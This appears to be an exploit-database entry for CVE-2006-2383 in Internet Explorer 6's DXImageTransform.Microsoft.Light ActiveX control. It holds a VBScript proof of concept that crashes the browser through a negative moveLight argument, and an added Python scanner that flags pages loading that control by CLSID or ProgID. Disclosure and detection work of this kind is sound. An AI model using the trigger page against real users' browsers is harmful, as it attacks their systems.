Microsoft DXImageTransform.Microsoft.Light - ActiveX Control Remote Code Execution
Author: Will Dormann
type: remote
platform: windows
port:
date_added: 2006-06-13
date_updated: 2013-08-31
verified: 1
codes: CVE-2006-2383;OSVDB-26444
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/18303/info
The DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution.
An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page.
<!--
MS Internet Explorer 6 DirectX Media DoS Vulnerability
DLL: dxtmsft.dll
Discovered & Coded by: r0ut3r (writ3r [at] gmail.com)
Description:
Sub moveLight (
ByVal lightNum As Long ,
ByVal x As Long ,
ByVal y As Long ,
ByVal z As Long ,
ByVal fAbsolute As Long
)
Supplying negative parameters throws an access violation.
-->
<object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight">
Unable to create object
</object>
<script language="vbscript">
Sub go
DXTLight.moveLight "-1", "1", "1", "1", "1"
End Sub
</script>
<input language=VBScript type="button" value="Try me" onclick="go()">
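For content inspection at a proxy or mail gateway, the following added example (not part of the original advisory or its proof of concept) flags HTML that instantiates the control, either through an `<object>` tag carrying the CLSID shown above or through a script-side ProgID lookup. The function names, the block-list sets and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID and ProgID come from the advisory; extend the sets for other controls.
BLOCKED_CLSIDS = {"F9EFBEC2-4302-11D2-952A-00C04FA34F05"}
BLOCKED_PROGIDS = {"dximagetransform.microsoft.light"}

# Constructed sample page (not from the advisory): one blocked object tag,
# one unrelated object tag, one script-side instantiation by ProgID.
SAMPLE = '''<html><body>
<object classid="CLSID:{f9efbec2-4302-11d2-952a-00c04fa34f05}" id="light1"></object>
<object classid="clsid:00000000-0000-0000-0000-000000000000" id="other"></object>
<script>var o = new ActiveXObject("DXImageTransform.Microsoft.Light");</script>
</body></html>'''

def normalize_clsid(value):
    """Return the bare upper-case GUID from a classid attribute, or None."""
    m = re.fullmatch(r"\s*clsid:\s*\{?([0-9a-f-]{36})\}?\s*", value or "", re.I)
    return m.group(1).upper() if m else None

class ActiveXFinder(HTMLParser):
    """Collects <object> tags whose classid is on the block list."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":
            return
        attrs = dict(attrs)
        clsid = normalize_clsid(attrs.get("classid"))
        if clsid in BLOCKED_CLSIDS:
            self.findings.append(("classid", clsid, attrs.get("id"), self.getpos()[0]))

def scan_html(text):
    """Return (kind, identifier, element id, line) tuples for blocked controls."""
    finder = ActiveXFinder()
    finder.feed(text)
    finder.close()
    findings = list(finder.findings)
    # Script-side instantiation: CreateObject("...") or new ActiveXObject("...")
    pattern = r"""(?:CreateObject|ActiveXObject)\s*\(\s*["']([^"']+)["']"""
    for m in re.finditer(pattern, text, re.I):
        if m.group(1).lower() in BLOCKED_PROGIDS:
            findings.append(("progid", m.group(1), None, text.count("\n", 0, m.start()) + 1))
    return findings

if __name__ == "__main__":
    print(*scan_html(SAMPLE), sep="\n")
```

The classid match is case-insensitive and accepts the GUID with or without braces, since both spellings reach the same control.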